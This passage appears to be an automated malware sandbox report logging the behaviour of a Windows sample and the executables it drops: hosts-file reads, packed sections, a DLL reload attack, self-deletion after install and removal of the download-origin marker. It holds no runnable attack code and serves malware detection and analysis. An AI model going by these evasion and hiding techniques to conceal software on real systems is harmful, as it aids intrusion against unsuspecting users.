                      Source: 5508.exe, 0000001F.00000000.408410706.0000000000F72000.00000002.00020000.sdmp, 5508.exe.7.drBinary or memory string: INSERT INTO [dbo].[Details] ([Employee Id], [Title], [First Name], [Last Name], [Email], [Phone Number], [Hire Date], [Date of Birth], [Basic Pay], [House Rental Allowance], [Dearness Allowance], [Provident Fund], [Date of Leaving], [Grade]) VALUES (@Employee_Id, @Title, @First_Name, @Last_Name, @Email, @Phone_Number, @Hire_Date, @Date_of_Birth, @Basic_Pay, @House_Rental_Allowance, @Dearness_Allowance, @Provident_Fund, @Date_of_Leaving, @Grade);
                      Source: sqlite3.dll.37.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                      Source: sqlite3.dll.37.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                      Source: 5508.exe, 0000001F.00000000.408410706.0000000000F72000.00000002.00020000.sdmp, 5508.exe.7.drBinary or memory string: UPDATE [dbo].[Details] SET [Employee Id] = @Employee_Id, [Title] = @Title, [First Name] = @First_Name, [Last Name] = @Last_Name, [Email] = @Email, [Phone Number] = @Phone_Number, [Hire Date] = @Hire_Date, [Date of Birth] = @Date_of_Birth, [Basic Pay] = @Basic_Pay, [House Rental Allowance] = @House_Rental_Allowance, [Dearness Allowance] = @Dearness_Allowance, [Provident Fund] = @Provident_Fund, [Date of Leaving] = @Date_of_Leaving, [Grade] = @Grade WHERE (([Employee Id] = @Original_Employee_Id) AND ([Title] = @Original_Title) AND ([First Name] = @Original_First_Name) AND ([Last Name] = @Original_Last_Name) AND ((@IsNull_Phone_Number = 1 AND [Phone Number] IS NULL) OR ([Phone Number] = @Original_Phone_Number)) AND ([Hire Date] = @Original_Hire_Date) AND ([Date of Birth] = @Original_Date_of_Birth) AND ([Basic Pay] = @Original_Basic_Pay) AND ((@IsNull_House_Rental_Allowance = 1 AND [House Rental Allowance] IS NULL) OR ([House Rental Allowance] = @Original_House_Rental_Allowance)) AND ((@IsNull_Dearness_Allowance = 1 AND [Dearness Allowance] IS NULL) OR ([Dearness Allowance] = @Original_Dearness_Allowance)) AND ((@IsNull_Provident_Fund = 1 AND [Provident Fund] IS NULL) OR ([Provident Fund] = @Original_Provident_Fund)) AND ((@IsNull_Date_of_Leaving = 1 AND [Date of Leaving] IS NULL) OR ([Date of Leaving] = @Original_Date_of_Leaving)) AND ([Grade] = @Original_Grade));
                      Source: sqlite3.dll.37.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                      Source: sqlite3.dll.37.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                      Source: sqlite3.dll.37.drBinary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                      Source: sqlite3.dll.37.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                      Source: sqlite3.dll.37.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3113.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5508.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\AdvancedRun.exeCode function: 32_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,32_2_004095FD
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6940:120:WilError_01
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3113.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3113.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5508.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5508.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\B644.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\AppData\Local\Temp\B644.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                      Source: SYzU0M7gx6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: SYzU0M7gx6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: SYzU0M7gx6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: SYzU0M7gx6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: SYzU0M7gx6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: SYzU0M7gx6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: SYzU0M7gx6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: C:\vojos\fuw.pdb source: 3C9D.exe, 0000001E.00000000.397350725.0000000000417000.00000002.00020000.sdmp, 3C9D.exe.7.dr
                      Source: Binary string: C:\kelut\takemiv\botuw31-mejosek-li.pdb source: 6630.exe.7.dr
                      Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: 2049.exe, 0000001C.00000002.504210996.0000000003999000.00000004.00000001.sdmp, AdvancedRun.exe, 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000024.00000002.432184416.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002A.00000002.477940508.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.28.dr
                      Source: Binary string: w+C:\honecogas58\lobitecip\siv\tivaruxanujel\93 vu.pdb` source: SYzU0M7gx6.exe
                      Source: Binary string: NH<*-C:\keso6.pdb` source: B644.exe.7.dr
                      Source: Binary string: C:\honecogas58\lobitecip\siv\tivaruxanujel\93 vu.pdb source: SYzU0M7gx6.exe
                      Source: Binary string: wntdll.pdbUGP source: 3C9D.exe, 0000001E.00000002.435763849.000000006B1B1000.00000020.00020000.sdmp, 1105.tmp.30.dr
                      Source: Binary string: wntdll.pdb source: 3C9D.exe, 1105.tmp.30.dr
                      Source: Binary string: C:\keso6.pdb source: B644.exe.7.dr
                      Source: Binary string: WC:\kelut\takemiv\botuw31-mejosek-li.pdb` source: 6630.exe.7.dr
                      Source: Binary string: C:\cilikaci91\kikoh\givokegexuhoti55 w.pdb source: 9A51.exe, 00000013.00000000.336974011.0000000000401000.00000020.00020000.sdmp, 9A51.exe, 00000014.00000000.351961783.0000000000401000.00000020.00020000.sdmp, 9A51.exe.7.dr
                      Source: Binary string: C:\cilikaci91\kikoh\givokegexuhoti55 w.pdb` source: 9A51.exe, 00000013.00000000.336974011.0000000000401000.00000020.00020000.sdmp, 9A51.exe, 00000014.00000000.351961783.0000000000401000.00000020.00020000.sdmp, 9A51.exe.7.dr

                      Data Obfuscation:

                      barindex
                      Detected unpacking (changes PE section rights)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeUnpacked PE file: 30.2.3C9D.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.cipizi:R;.rsrc:R; vs .text:EW;
                      Source: C:\Users\user\AppData\Local\Temp\6630.exeUnpacked PE file: 34.2.6630.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeCode function: 28_2_0059D47C push esi; iretd 28_2_0059D488
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeCode function: 28_2_059C2678 push ebx; ret 28_2_059C287A
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_00402E54 push eax; ret 30_2_00402EB3
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_00402E63 push eax; ret 30_2_00402EB3
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_00402665 push cs; ret 30_2_0040266B
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_0040290C push eax; iretd 30_2_0040290D
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_00402E16 push eax; ret 30_2_00402EB3
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_00402DC0 push eax; ret 30_2_00402EB3
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_00402DD8 push eax; ret 30_2_00402EB3
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_00402DE8 push eax; ret 30_2_00402EB3
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_00402DF1 push eax; ret 30_2_00402EB3
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_00402E82 push eax; ret 30_2_00402EB3
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_00402E85 push eax; ret 30_2_00402EB3
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_00402D92 push eax; ret 30_2_00402EB3
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_00402E95 push eax; ret 30_2_00402EB3
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_00401D9A pushad ; ret 30_2_00401DA3
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_00402E9C push eax; ret 30_2_00402EB3
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B22D0D1 push ecx; ret 30_2_6B22D0E4
                      Source: C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\AdvancedRun.exeCode function: 32_2_0040B550 push eax; ret 32_2_0040B564
                      Source: C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\AdvancedRun.exeCode function: 32_2_0040B550 push eax; ret 32_2_0040B58C
                      Source: C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\AdvancedRun.exeCode function: 32_2_0040B50D push ecx; ret 32_2_0040B51D
                      Source: C:\Users\user\AppData\Local\Temp\6630.exeCode function: 34_2_04901AB1 push ds; retf 34_2_04901AB9
                      Source: C:\Users\user\AppData\Local\Temp\6630.exeCode function: 34_2_049028C4 push esp; iretd 34_2_049028C5
                      Source: C:\Users\user\AppData\Local\Temp\6630.exeCode function: 34_2_04901614 push edx; iretd 34_2_04901622
                      Source: C:\Users\user\AppData\Local\Temp\6630.exeCode function: 34_2_04902728 push ds; retf 34_2_0490272C
                      Source: C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\AdvancedRun.exeCode function: 36_2_0040B550 push eax; ret 36_2_0040B564
                      Source: C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\AdvancedRun.exeCode function: 36_2_0040B550 push eax; ret 36_2_0040B58C
                      Source: C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\AdvancedRun.exeCode function: 36_2_0040B50D push ecx; ret 36_2_0040B51D
                      Source: C:\Users\user\Desktop\SYzU0M7gx6.exeCode function: 0_2_00426C50 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00426C50
                      Source: 3113.exe.7.drStatic PE information: 0xBCDF81AC [Sat May 31 12:18:52 2070 UTC]
                      Source: SYzU0M7gx6.exeStatic PE information: section name: .xazum
                      Source: 9A51.exe.7.drStatic PE information: section name: .noxi
                      Source: B644.exe.7.drStatic PE information: section name: .bumid
                      Source: 3C9D.exe.7.drStatic PE information: section name: .cipizi
                      Source: dtrsehc.7.drStatic PE information: section name: .xazum
                      Source: gjrsehc.7.drStatic PE information: section name: .cipizi
                      Source: 3113.exe.7.drStatic PE information: real checksum: 0x10f50 should be: 0x5be1
                      Source: 5508.exe.7.drStatic PE information: real checksum: 0x2bdee should be: 0x3529c
                      Source: 2049.exe.7.drStatic PE information: real checksum: 0x8ddc4 should be: 0x7fd66
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.992417528
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.97994250456
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.85713092672
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.99165285812
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.66552134689
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.38549549306
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.992417528
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.38549549306
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\dtrsehcJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\gjrsehcJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeFile created: C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\AdvancedRun.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\6630.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\3113.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\3C9D.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\dtrsehcJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\9A51.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\B644.exeFile created: C:\Users\user\AppData\LocalLow\sqlite3.dllJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\gjrsehcJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\5508.exeFile created: C:\Users\user\AppData\Local\Temp\e6afa9cb-72f6-46b2-8522-aff4fca0d0ff\AdvancedRun.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeFile created: C:\Users\user\AppData\Local\Temp\1105.tmpJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\2049.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\B644.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\5508.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\AdvancedRun.exeCode function: 32_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,32_2_00401306

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      DLL reload attack detectedShow sources
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeModule Loaded: Original DLL: C:\USERS\user\APPDATA\LOCAL\TEMP\1105.TMP reload: C:\WINDOWS\SYSWOW64\NTDLL.DLL
                      Deletes itself after installationShow sources
                      Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\syzu0m7gx6.exeJump to behavior
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\dtrsehc:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\AdvancedRun.exeCode function: 32_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,32_2_00408E31
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9A51.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9A51.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9A51.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9A51.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9A51.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9A51.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9A51.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9A51.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3113.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
